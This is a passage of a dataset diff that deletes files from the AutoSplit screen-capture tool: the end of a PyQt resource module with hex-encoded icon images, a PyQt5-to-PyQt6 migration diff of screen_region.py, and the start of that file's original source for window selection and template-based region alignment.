-\x57\x63\x58\x9e\x0f\x7b\xdf\x33\xdb\x7d\x41\x77\x4a\xc9\x5b\x8b\ -\x23\xbc\xa6\x36\x85\x93\xe5\x3a\x81\xeb\xa1\xeb\x1d\x08\x01\x4a\ -\x5a\x8a\xca\x52\x76\x0c\x35\x4f\x53\xf3\x34\x23\x9e\xa6\xea\xc6\ -\x5b\x8c\x45\x15\x7b\x0a\x4a\x80\x14\x16\x71\x85\x9d\x86\xae\xa2\ -\xb0\x36\x2e\x69\x36\x36\x9e\xb2\x13\x1a\x49\x60\x20\xd0\x92\x76\ -\x24\xa9\x87\x92\xe5\x40\xc5\xff\x0f\x63\x61\xf7\xf5\x79\x81\x87\ -\x21\x7a\xa9\x3a\x74\x62\xfe\xf9\xb0\xc5\x7f\xb5\xf0\x3f\xc4\x90\ -\x08\x3f\x0c\xd9\xb3\x5a\x15\x0e\x6c\x15\x82\x5f\x28\xd6\xf8\xf7\ -\xb5\x69\xdc\x2c\x4d\x14\xea\x35\x76\xf5\x2f\x44\x5c\x82\xac\x84\ -\xc5\x53\x96\x82\x32\x14\x94\xc5\x53\x86\xa2\xb2\xb8\xd2\xe2\x2a\ -\x8b\xc0\x22\xc5\xf9\xa3\xd8\x8c\x15\x68\x13\xc7\xed\x91\x16\x04\ -\x46\x10\x68\x11\x0b\xbf\x16\x84\x56\x10\x19\x41\xd4\x51\x0e\x76\ -\xb5\x5b\xc2\x90\xbd\x44\x17\xe1\x37\x60\xf9\x14\x67\x82\x36\x3f\ -\x27\xe0\x8f\x87\xc5\xf2\x77\x19\xba\x67\xb7\x2a\x1c\x98\x12\x82\ -\xb7\x78\x15\xfe\xc3\xc8\x34\xe5\x2c\xcd\x12\x48\x02\x7b\xc9\x2f\ -\xb8\xe0\x69\x5f\xb2\xd5\xb8\x56\xac\x20\xd6\xfc\xe5\x86\xa1\xb5\ -\x04\xf5\x33\x3c\x19\xfa\xfc\x82\x80\x77\x22\x08\x87\x49\xf8\x61\ -\x88\x9f\xeb\xcc\x7b\x66\xb1\x50\x15\xf0\x26\xaf\xcc\x4f\xd6\xa6\ -\xa8\x79\x95\xb4\x57\x95\x33\x08\x58\x0b\xad\x45\xa8\x9f\xe5\xb1\ -\x28\xe0\xc7\x3b\x5b\x7d\x7a\xd8\x84\x1f\x06\xb0\x12\x70\xbd\x2c\ -\xfc\xe5\x47\x98\xb8\xfb\xae\x00\xb8\x57\x87\x9c\x0d\xdb\x3c\x53\ -\x3a\x8c\xb8\x19\x6d\x20\xca\xc9\x06\x46\xc7\xb5\xfd\x8d\x39\x3e\ -\xab\x43\xfe\xb3\x10\x7c\x18\x30\xc3\x28\xfc\x30\xc4\x0a\x00\x56\ -\x7a\x07\x42\xe0\x3e\xad\x79\x3c\x6a\xf3\x6c\x6b\xd9\xe4\x16\xc9\ -\x47\x77\xe5\x5c\x82\x0e\x61\xf9\x34\x51\x6b\x91\x0f\x1b\xcd\x8f\ -\x61\xf9\x94\x10\xd9\x38\xc2\xab\x5f\x6c\x08\x31\x98\x39\x34\x0b\ -\x02\x61\x0d\x2f\x90\x8a\x5f\x2a\x8f\xf1\xb2\xca\x26\xc4\x20\x95\ -\x0e\xe7\xf4\x97\xa0\x01\xf5\x39\x1a\x7e\x83\x77\x59\xcb\xaf\x60\ -\x79\x52\xc8\xc1\xad\xf0\x5b\x2f\x1b\x42\x01\xc0\x05\x3b\x04\xfb\ -\xa4\xe4\xe7\xbd\x0a\xdf\x52\x9b\xa4\xe4\x96\xd2\x5e\x59\x4e\x9a\ -\x58\x03\xed\x25\xa8\xcf\x71\x22\xf4\xf9\x35\xe0\x9d\xc0\xf2\xa0\ -\xd6\xf6\x5f\x2b\x1b\x46\x01\xc0\x05\x4a\x60\x4c\xc0\x0f\xbb\x25\ -\xde\x5c\xd9\xc4\xa6\x62\x2d\x0f\x09\x36\x22\x3a\x84\xc6\x3c\xb6\ -\xb5\xc8\xa7\x75\xc4\x2f\x0b\xc1\xdf\x32\xe0\xa5\xbd\xd7\xca\x86\ -\x7c\xed\x3b\x5b\x85\x9e\x85\x6f\x52\x0e\x3f\x5b\x1e\xe7\x39\x95\ -\x09\x18\x94\x46\xa2\x9c\x1b\x27\x68\x42\xfd\x2c\x75\xbf\xc9\x3d\ -\xd6\xf0\xab\x68\x1e\x45\xc1\x63\xdf\xb6\x71\x84\x1f\x36\xa8\x02\ -\x80\xce\x36\x61\x5c\x3c\xf3\x0c\x29\xf9\xf9\x42\x95\x6f\xa8\x4c\ -\x50\xf4\xca\x69\xaf\x2c\xa7\x9f\x18\x0d\xad\x73\xd8\xe6\x39\x8e\ -\x85\x3e\xff\x9d\xd8\xe5\x5f\xda\x28\x2e\xff\xc5\x6c\x58\x05\x00\ -\x9d\x90\xc0\x00\x82\x4d\xc0\x77\xbb\x05\xde\x54\x1e\x67\x67\x69\ -\x34\xf7\x06\x86\x91\xa0\x05\x8d\x79\x02\xbf\xce\xdf\x19\xcd\xaf\ -\x09\xc1\xa7\x19\xd2\xfd\xfd\xf5\xb2\xa1\x15\x40\x97\x99\x43\xb3\ -\x00\xca\x5a\xbe\x56\x2a\x7e\xa2\x50\xe5\xe5\x95\x71\xbc\xdc\x1b\ -\x18\x0e\x8c\x8e\x0b\x7b\x9a\xe7\x38\x11\xf9\xfc\x9e\xb5\xfc\x11\ -\x96\x53\x1b\x21\xcb\x7f\x35\x72\x05\xd0\x61\xe6\x3d\xb3\x98\xb8\ -\xc9\x66\x5a\xc0\x77\x3b\x05\x7e\xa4\x34\xc6\xee\xd2\x08\x0c\x5b\ -\x43\xd1\x86\xc1\xae\x58\xfd\xb6\x5f\xe7\xc3\xc6\xf0\x3b\xc0\x27\ -\x80\x68\xa3\xc5\xfa\x97\x23\x57\x00\x17\xb1\xf7\x3d\xb1\x37\x00\ -\x3c\x4f\x4a\x7e\xd8\x2d\xf1\xaa\xca\x38\xa3\x85\x2a\xdd\x53\x8a\ -\x72\x06\x80\x28\x80\xd6\x22\xb6\xb5\xc8\xc3\x3a\xe0\xed\x16\xfe\ -\x54\xc0\x9c\xb5\xf0\xd8\xb7\xe7\xc2\xdf\x25\x57\x00\x6b\xb0\xf7\ -\x3d\xb3\xdd\xe6\x98\x0a\x82\x57\x29\x87\x37\x16\x2a\xdc\x59\x1e\ -\xa7\xe0\x95\xc8\xef\x5a\x86\x31\x3a\x9e\xd7\xd7\x3c\xc7\xd9\xb0\ -\xcd\x5f\x5a\xc3\x1f\x00\x5f\x04\x4c\x6e\xf5\x2f\x25\x7f\x95\xaf\ -\xc0\xcc\xa1\x59\xa4\x02\x1d\xb2\x15\xc1\xeb\x1c\x8f\xef\x2f\xd6\ -\xd8\x5f\x1e\x43\x66\xf5\x50\x92\x8d\x8a\x35\xf1\xd6\x5e\xf3\x1c\ -\x6d\xbf\xc1\x3f\x18\xcd\xef\x03\x1f\x05\x5a\xe4\x56\xff\xb2\xe4\ -\x0a\x60\x1d\xcc\xbc\x67\x25\x49\x78\x40\x48\xbe\xcb\x29\x70\x77\ -\xb1\xc6\x4d\xa5\x51\xe4\x30\xcf\x1a\x18\x04\xac\x85\xb0\x05\xad\ -\x45\xa2\x76\x9d\xfb\x4c\xc8\x1f\x5b\xcb\x7b\x11\x9c\xc9\x05\xff\ -\xea\xe4\x0a\xe0\x1a\xd8\xfb\x17\xb3\x10\x4f\x52\x7e\x86\x90\x7c\ -\x9f\x5b\xe4\x9b\x8b\x35\xb6\x15\x6b\x88\xdc\x23\x48\x16\x6b\xe3\ -\xc3\x38\xdb\x4b\xe8\xf6\x32\x87\x75\xc8\x9f\x5a\xc3\x21\x6b\x38\ -\x26\x24\x36\x17\xfc\xf5\x91\x2b\x80\xeb\xa0\xa3\x08\x0a\xc0\x1d\ -\x42\xf2\x9d\x6e\x91\x57\x17\xab\xec\x28\x8e\x20\x94\x97\x97\x15\ -\xf7\x13\x6b\x62\x8b\xdf\x5e\x26\x6a\xd7\x79\x50\x87\xdc\x63\x0d\ -\xf7\x00\x8f\x00\x26\x17\xfc\x6b\x23\x7f\x55\xaf\x93\xce\xc0\x11\ -\x00\x0f\xcb\x33\x85\xe4\x75\x4e\x81\x7f\x57\x28\x33\x53\x1c\xc5\ -\xc9\x5b\x8e\x7b\x8b\xd1\x71\xc7\x5e\x7b\x99\x66\xd0\xe4\x4b\x3a\ -\xe4\x90\xb5\x7c\xc8\x5a\x8e\x08\x91\x0b\xfe\xf5\x92\xbf\xa2\x3d\ -\x60\x55\x68\x30\x23\x24\xaf\x51\x2e\xdf\xe2\x95\xb9\xb5\x58\x8d\ -\x4b\x8b\x87\x61\x3a\x71\x1a\x58\x0b\x3a\x88\xe7\xf2\xf9\x75\xce\ -\x86\x6d\x3e\xa3\x23\xfe\x02\xcb\xc7\x80\xa7\x20\x77\xf5\x6f\x94\ -\x5c\x01\xf4\x90\x8e\x22\x90\xc0\x76\x04\x2f\x53\x8a\xff\xcb\x29\ -\xf2\xb5\xc5\x1a\x9b\xbc\x32\x38\x85\xdc\x2b\x58\x0f\x3a\x8a\xdd\ -\x7c\xbf\x41\x10\x34\xf9\x8a\x0e\xf8\x98\xd1\xfc\x15\xf0\x39\x60\ -\xc1\x5a\x78\xfc\x75\xb9\xe0\xf7\x82\xfc\x75\xec\x03\x7b\xfe\x6c\ -\x16\xe5\x82\x8e\xa8\x09\xc1\xf3\x84\xe2\xdf\x3a\x2e\xaf\x70\x4b\ -\xec\x2b\x54\x28\x77\xbd\x82\x5c\x19\x9c\xc7\x68\x88\xda\xe0\x37\ -\x31\x41\x93\xa7\x23\x9f\xcf\x98\x88\xbf\xb1\x96\x8f\x5b\xc3\x51\ -\x21\x88\x16\x16\x61\xe1\x87\x72\xc1\xef\x25\xf9\x2b\xd8\x67\xf6\ -\xfc\x79\xbc\x85\x28\x04\xdb\x11\xbc\x50\x2a\x5e\xe5\x14\x78\xae\ -\x5b\x64\x97\x57\xc6\x73\x8b\x71\xa9\xf1\x46\x54\x06\x26\x82\xd0\ -\x87\xb0\x85\x0e\x9a\xcc\x87\x3e\xf7\x9b\x88\x7f\xb0\x86\xbf\xb7\ -\x96\x07\xdd\x32\xf5\xe5\x13\x70\xf2\x47\x72\xa1\xef\x17\x1b\xf0\ -\xb5\x4b\x87\xdd\xef\x9e\xc5\x2d\x41\xe4\x53\x02\x76\x09\xc9\x0b\ -\xa4\xe2\xc5\x8e\xc7\x57\x3b\x05\x76\x79\x25\xaa\x4e\x11\x1c\xb7\ -\xd3\x89\x38\x84\x4f\xc6\x9a\xd8\xd2\x87\x6d\x08\xdb\x44\x41\x8b\ -\x53\x91\xcf\x97\x3b\x42\xff\x2f\xd6\xf2\x80\xd1\x2c\x08\x09\x47\ -\xbf\x23\x17\xfa\x24\x10\x36\x1e\x91\xb3\x72\xee\xa4\xd8\x88\xa6\ -\x28\x61\x76\xfe\xd1\x2c\xc5\x09\x08\x9b\x78\x42\xb0\x5d\x48\x9e\ -\x21\x25\xcf\x97\x0e\xcf\x56\x2e\xb7\xba\x05\x36\xbb\x25\x8a\x8e\ -\xd7\xf1\x0e\xd4\x60\x7a\x08\xd6\xc6\x56\x3e\x0a\x20\xf2\x31\x61\ -\x9b\x46\xe4\x73\x4c\x87\x7c\xd1\x68\x3e\x61\x0d\xf7\x5a\xcb\xc3\ -\x58\x96\x11\xd8\x3c\xae\x4f\x9e\xae\x02\xe8\xf6\xbb\x85\xb9\x02\ -\x48\x9e\x9d\xef\x98\x45\x87\x88\x42\x85\x2a\x82\x5d\x42\xf2\x0c\ -\xa9\xb8\x53\x2a\x6e\x57\x2e\x7b\x95\xcb\x66\xb7\x40\x55\x79\x28\ -\xc7\x8b\x3d\x84\xac\x29\x05\x6b\xe2\x2f\x1d\xc5\xa3\xb6\x22\x9f\ -\x28\x0a\xa8\xeb\x80\x13\x3a\xe4\x51\xa3\xb9\xd7\x18\xee\xb7\x86\ -\xc3\x58\x9e\x1e\xdf\x45\xfb\xe4\x03\x70\xf2\x07\x73\xa1\x4f\x92\ -\x4b\x0c\xbe\xb5\x17\x1e\x09\x93\x2b\x80\xf4\xb9\xe9\x5d\xb3\x04\ -\x4d\x44\xa1\x46\x55\x08\xa6\x84\x64\x46\x48\x0e\x4a\xc5\x33\xa4\ -\xc3\x8c\x74\xd8\xa5\x1c\xc6\x94\x4b\x4d\xb9\x78\xca\x41\x48\xa7\ -\xa3\x18\x64\xe7\x0b\x2e\x7f\xba\x27\x6b\xfc\x39\x5c\xfe\x24\x51\ -\xdb\x39\x14\xd4\xc4\x56\xbd\xeb\xca\x9b\x08\x4c\x84\xd5\x11\x2d\ -\x1d\xd0\xd0\x11\x67\x75\xc4\x13\x56\xf3\x15\xa3\x79\xd8\x1a\xbe\ -\x6c\x2d\x8f\x59\xc3\x19\x6b\x68\x02\x1c\x7b\x43\x2e\xf0\x69\xd2\ -\x91\x77\x8f\xf8\x91\x86\xb9\xb4\x0f\x00\x9b\x7f\x77\x96\xe9\xdb\ -\x60\xf9\x04\x2e\x82\xb2\x90\x4c\x0a\xc1\xb4\x10\xdc\x24\x24\x3b\ -\x84\x64\xaf\x54\x6c\x93\x8a\x2d\x52\x31\x26\x14\xa3\x52\x51\x90\ -\x0a\x4f\x48\x1c\x29\x51\x48\xa4\x10\x48\x21\x38\x7f\xa6\xdf\xaa\ -\xf3\x01\xbb\x42\x8e\xc5\x58\x83\xb5\xf1\xff\xb5\x35\x44\x46\x13\ -\x5a\x43\xdb\x68\xea\x46\xb3\x64\x35\xf3\xc6\x32\x67\x35\x27\xac\ -\xe1\x29\x63\x38\x6a\x2d\x27\x30\x3c\x6d\x2d\x0b\x61\x8b\xfa\xa9\ -\x07\x30\x13\xbb\xe1\xf4\x8f\xe5\x02\x9f\x25\x2e\x31\xf8\x69\x2f\ -\x28\xe7\xfa\x99\xfc\xad\x59\x96\x4e\xc3\xe6\xfd\x38\xd2\xa1\x28\ -\x04\x35\x21\x18\x45\x30\x21\x04\xe3\x42\x32\x06\x8c\x0a\xc9\x38\ -\x50\x15\x82\x32\x82\xa2\x88\x43\x3e\x85\x40\x60\xe3\x83\x80\x01\ -\x1f\x8b\x01\x9a\xd6\xd2\xc6\xb2\x64\xa1\x8e\xe1\x9c\xb5\x9c\x03\ -\xce\x59\xcb\x92\x35\x2c\x5a\xcb\xb2\x35\xf8\x3a\x20\xd8\xf7\x0a\ -\xcc\xa7\xff\x27\xb4\x7e\x39\x17\xf4\x41\xe4\xff\x00\x21\xbf\xbf\ -\x45\xaa\x78\x3d\x13\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\ -\x82\ -" - -qt_resource_name = b"\ -\x00\x09\ -\x0a\x6c\x78\x43\ -\x00\x72\ -\x00\x65\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x73\ -\x00\x10\ -\x0a\x2c\xb7\x07\ -\x00\x64\ -\x00\x6f\x00\x6e\x00\x61\x00\x74\x00\x65\x00\x62\x00\x75\x00\x74\x00\x74\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\ -\x00\x08\ -\x0a\x61\x42\x7f\ -\x00\x69\ -\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\ -" - -qt_resource_struct = b"\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\ -\x00\x00\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\ -\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x3b\x83\ -" - -def qInitResources(): - QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -def qCleanupResources(): - QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -qInitResources() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff deleted file mode 100644 index 7707136..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.diff +++ /dev/null @@ -1,130 +0,0 @@ -diff --git a/src/screen_region.py b/src/screen_region.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/screen_region.py - +++ b/src/screen_region.py -@@ -1,5 +1,6 @@ --from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -+from PyQt6 import QtCore, QtGui, QtTest, QtWidgets - from win32 import win32gui -+from typing import cast, Callable - import capture_windows - import ctypes - import ctypes.wintypes -@@ -25,11 +26,11 @@ def selectRegion(self): - self.heightSpinBox.setValue(selector.height) - - # Grab the window handle from the coordinates selected by the widget -- self.hwnd = win32gui.WindowFromPoint((selector.left, selector.top)) -+ self.hwnd = cast(int, win32gui.WindowFromPoint((selector.left, selector.top))) - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. -- GetAncestor = ctypes.windll.user32.GetAncestor -+ GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor) - GA_ROOT = 2 - - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): -@@ -80,10 +81,9 @@ def selectWindow(self): - QtTest.QTest.qWait(1) - - # Grab the window handle from the coordinates selected by the widget -- self.hwnd = None -- self.hwnd = win32gui.WindowFromPoint((selector.x, selector.y)) -+ self.hwnd = cast(int, win32gui.WindowFromPoint((selector.x, selector.y))) - -- if self.hwnd is None: -+ if self.hwnd == 0: - return - - del selector -@@ -91,7 +91,7 @@ def selectWindow(self): - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. -- GetAncestor = ctypes.windll.user32.GetAncestor -+ GetAncestor = cast(Callable[[int, int], int], ctypes.windll.user32.GetAncestor) - GA_ROOT = 2 - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): - self.hwnd = GetAncestor(self.hwnd, GA_ROOT) -@@ -124,8 +124,11 @@ def alignRegion(self): - return - # This is the image used for aligning the capture region - # to the best fit for the user. -- template_filename = str(QtWidgets.QFileDialog.getOpenFileName(self, "Select Reference Image", "", -- "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)")) -+ template_filename = str(QtWidgets.QFileDialog.getOpenFileName( -+ self, -+ "Select Reference Image", -+ "", -+ "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)")) - - # return if the user presses cancel - if template_filename == '': -@@ -221,13 +224,13 @@ class SelectWindowWidget(QtWidgets.QWidget): - self.setWindowTitle(' ') - - self.setWindowOpacity(0.5) -- self.setWindowFlags(QtCore.Qt.FramelessWindowHint) -+ self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint) - self.show() - -- def mouseReleaseEvent(self, event): -+ def mouseReleaseEvent(self, event: QtGui.QMouseEvent): - self.close() -- self.x = event.pos().x() -- self.y = event.pos().y() -+ self.x = int(event.position().x()) -+ self.y = int(event.position().y()) - - # Widget for dragging screen region - # https://github.com/harupy/snipping-tool -@@ -254,36 +257,36 @@ class SelectRegionWidget(QtWidgets.QWidget): - self.begin = QtCore.QPoint() - self.end = QtCore.QPoint() - self.setWindowOpacity(0.5) -- QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CrossCursor)) -- self.setWindowFlags(QtCore.Qt.FramelessWindowHint) -+ QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.CrossCursor)) -+ self.setWindowFlags(QtCore.Qt.WindowType.FramelessWindowHint) - self.show() - -- def paintEvent(self, event): -+ def paintEvent(self, event: QtGui.QPaintEvent): - qp = QtGui.QPainter(self) - qp.setPen(QtGui.QPen(QtGui.QColor('red'), 2)) - qp.setBrush(QtGui.QColor('opaque')) - qp.drawRect(QtCore.QRect(self.begin, self.end)) - -- def mousePressEvent(self, event): -- self.begin = event.pos() -+ def mousePressEvent(self, event: QtGui.QMouseEvent): -+ self.begin = event.position().toPoint() - self.end = self.begin - self.update() - -- def mouseMoveEvent(self, event): -- self.end = event.pos() -+ def mouseMoveEvent(self, event: QtGui.QMouseEvent): -+ self.end = event.position().toPoint() - self.update() - -- def mouseReleaseEvent(self, event): -- QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.ArrowCursor)) -+ def mouseReleaseEvent(self, event: QtGui.QMouseEvent): -+ QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.CursorShape.ArrowCursor)) - self.close() - - # The coordinates are pulled relative to the top left of the set geometry, - # so the added virtual screen offsets convert them back to the virtual - # screen coordinates -- self.left = min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN -- self.top = min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN -- self.right = max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN -- self.bottom = max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN -+ self.left = int(min(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN) -+ self.top = int(min(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN) -+ self.right = int(max(self.begin.x(), self.end.x()) + self.SM_XVIRTUALSCREEN) -+ self.bottom = int(max(self.begin.y(), self.end.y()) + self.SM_YVIRTUALSCREEN) - - self.height = self.bottom - self.top - self.width = self.right - self.left diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py deleted file mode 100644 index c694799..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$screen_region.py.source.py +++ /dev/null @@ -1,289 +0,0 @@ -from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -import capture_windows -import ctypes -import ctypes.wintypes -import cv2 -import numpy as np - -def selectRegion(self): - # Create a screen selector widget - selector = SelectRegionWidget() - - # Need to wait until the user has selected a region using the widget before moving on with - # selecting the window settings - while selector.height == -1 and selector.width == -1: - QtTest.QTest.qWait(1) - - # return an error if width or height are zero. - if selector.width == 0 or selector.height == 0: - self.regionSizeError() - return - - # Width and Height of the spinBox - self.widthSpinBox.setValue(selector.width) - self.heightSpinBox.setValue(selector.height) - - # Grab the window handle from the coordinates selected by the widget - self.hwnd = win32gui.WindowFromPoint((selector.left, selector.top)) - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. - GetAncestor = ctypes.windll.user32.GetAncestor - GA_ROOT = 2 - - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): - self.hwnd = GetAncestor(self.hwnd, GA_ROOT) - - if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '': - self.hwnd_title = win32gui.GetWindowText(self.hwnd) - - # Convert the Desktop Coordinates to Window Coordinates - DwmGetWindowAttribute = ctypes.windll.dwmapi.DwmGetWindowAttribute - DWMWA_EXTENDED_FRAME_BOUNDS = 9 - - # Pull the window's coordinates relative to desktop into rect - DwmGetWindowAttribute(self.hwnd, - ctypes.wintypes.DWORD(DWMWA_EXTENDED_FRAME_BOUNDS), - ctypes.byref(self.rect), - ctypes.sizeof(self.rect) - ) - - # On Windows 10 the windows have offsets due to invisible pixels not accounted for in DwmGetWindowAttribute - # TODO: Since this occurs on Windows 10, is DwmGetWindowAttribute even required over GetWindowRect alone? - # Research needs to be done to figure out why it was used it over win32gui in the first place... - # I have a feeling it was due to a misunderstanding and not getting the correct parent window before. - offset_left = self.rect.left - win32gui.GetWindowRect(self.hwnd)[0] - offset_top = self.rect.top - win32gui.GetWindowRect(self.hwnd)[1] - - self.rect.left = selector.left - (self.rect.left - offset_left) - self.rect.top = selector.top - (self.rect.top - offset_top) - self.rect.right = self.rect.left + selector.width - self.rect.bottom = self.rect.top + selector.height - - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - - # Delete that widget since it is no longer used from here on out - del selector - - # check if live image needs to be turned on or just set a single image - self.checkLiveImage() - -def selectWindow(self): - # Create a screen selector widget - selector = SelectWindowWidget() - - # Need to wait until the user has selected a region using the widget before moving on with - # selecting the window settings - while selector.x == -1 and selector.y == -1: - QtTest.QTest.qWait(1) - - # Grab the window handle from the coordinates selected by the widget - self.hwnd = None - self.hwnd = win32gui.WindowFromPoint((selector.x, selector.y)) - - if self.hwnd is None: - return - - del selector - - # Want to pull the parent window from the window handle - # By using GetAncestor we are able to get the parent window instead - # of the owner window. - GetAncestor = ctypes.windll.user32.GetAncestor - GA_ROOT = 2 - while win32gui.IsChild(win32gui.GetParent(self.hwnd), self.hwnd): - self.hwnd = GetAncestor(self.hwnd, GA_ROOT) - - if self.hwnd != 0 or win32gui.GetWindowText(self.hwnd) != '': - self.hwnd_title = win32gui.GetWindowText(self.hwnd) - - # getting window bounds - # on windows there are some invisble pixels that are not accounted for - # also the top bar with the window name is not accounted for - # I hardcoded the x and y coordinates to fix this - # This is not an ideal solution because it assumes every window will have a top bar - rect = win32gui.GetClientRect(self.hwnd) - self.rect.left = 8 - self.rect.top = 31 - self.rect.right = 0 + rect[2] - self.rect.bottom = 0 + rect[3] - - self.widthSpinBox.setValue(self.rect.right) - self.heightSpinBox.setValue(self.rect.bottom) - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - - self.checkLiveImage() - -def alignRegion(self): - # check to see if a region has been set - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - # This is the image used for aligning the capture region - # to the best fit for the user. - template_filename = str(QtWidgets.QFileDialog.getOpenFileName(self, "Select Reference Image", "", - "Image Files (*.png *.jpg *.jpeg *.jpe *.jp2 *.bmp *.tiff *.tif *.dib *.webp *.pbm *.pgm *.ppm *.sr *.ras)")) - - # return if the user presses cancel - if template_filename == '': - return - - template = cv2.imread(template_filename, cv2.IMREAD_COLOR) - - # shouldn't need this, but just for caution, throw a type error if file is not a valid image file - if template is None: - self.alignRegionImageTypeError() - return - - # Obtaining the capture of a region which contains the - # subregion being searched for to align the image. - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # Obtain the best matching point for the template within the - # capture. This assumes that the template is actually smaller - # than the dimensions of the capture. Since we are using SQDIFF - # the best match will be the min_val which is located at min_loc. - # The best match found in the image, set everything to 0 by default - # so that way the first match will overwrite these values - best_match = 0.0 - best_height = 0 - best_width = 0 - best_loc = (0, 0) - - # This tests 50 images scaled from 20% to 300% of the original template size - for scale in np.linspace(0.2, 3, num=56): - width = int(template.shape[1] * scale) - height = int(template.shape[0] * scale) - - # The template can not be larger than the capture - if width > capture.shape[1] or height > capture.shape[0]: - continue - - resized = cv2.resize(template, (width, height)) - - result = cv2.matchTemplate(capture, resized, cv2.TM_SQDIFF) - min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(result) - - # The maximum value for SQ_DIFF is dependent on the size of the template - # we need this value to normalize it from 0.0 to 1.0 - max_error = resized.size * 255 * 255 - similarity = 1 - (min_val / max_error) - - # Check if the similarity was good enough to get alignment - if similarity > best_match: - best_match = similarity - best_width = width - best_height = height - best_loc = min_loc - - # Go ahead and check if this satisfies our requirement before setting the region - # We don't want a low similarity image to be aligned. - if best_match < 0.9: - self.alignmentNotMatchedError() - return - - # The new region can be defined by using the min_loc point and the - # height and width of the template. - self.rect.left = self.rect.left + best_loc[0] - self.rect.top = self.rect.top + best_loc[1] - self.rect.right = self.rect.left + best_width - self.rect.bottom = self.rect.top + best_height - - self.xSpinBox.setValue(self.rect.left) - self.ySpinBox.setValue(self.rect.top) - self.widthSpinBox.setValue(best_width) - self.heightSpinBox.setValue(best_height) - - -# widget to select a window and obtain its bounds -class SelectWindowWidget(QtWidgets.QWidget): - def __init__(self): - super(SelectWindowWidget, self).__init__() - user32 = ctypes.windll.user32 - user32.SetProcessDPIAware() - - self.x = -1 - self.y = -1 - - # We need to pull the monitor information to correctly draw the geometry covering all portions - # of the user's screen. These parameters create the bounding box with left, top, width, and height - self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76) - self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77) - self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78) - self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79) - - self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN, - self.SM_CYVIRTUALSCREEN) - self.setWindowTitle(' ') - - self.setWindowOpacity(0.5) - self.setWindowFlags(QtCore.Qt.FramelessWindowHint) - self.show() - - def mouseReleaseEvent(self, event): - self.close() - self.x = event.pos().x() - self.y = event.pos().y() - -# Widget for dragging screen region -# https://github.com/harupy/snipping-tool -class SelectRegionWidget(QtWidgets.QWidget): - def __init__(self): - super(SelectRegionWidget, self).__init__() - user32 = ctypes.windll.user32 - user32.SetProcessDPIAware() - - # We need to pull the monitor information to correctly draw the geometry covering all portions - # of the user's screen. These parameters create the bounding box with left, top, width, and height - self.SM_XVIRTUALSCREEN = user32.GetSystemMetrics(76) - self.SM_YVIRTUALSCREEN = user32.GetSystemMetrics(77) - self.SM_CXVIRTUALSCREEN = user32.GetSystemMetrics(78) - self.SM_CYVIRTUALSCREEN = user32.GetSystemMetrics(79) - - self.setGeometry(self.SM_XVIRTUALSCREEN, self.SM_YVIRTUALSCREEN, self.SM_CXVIRTUALSCREEN, - self.SM_CYVIRTUALSCREEN) - self.setWindowTitle(' ') - - 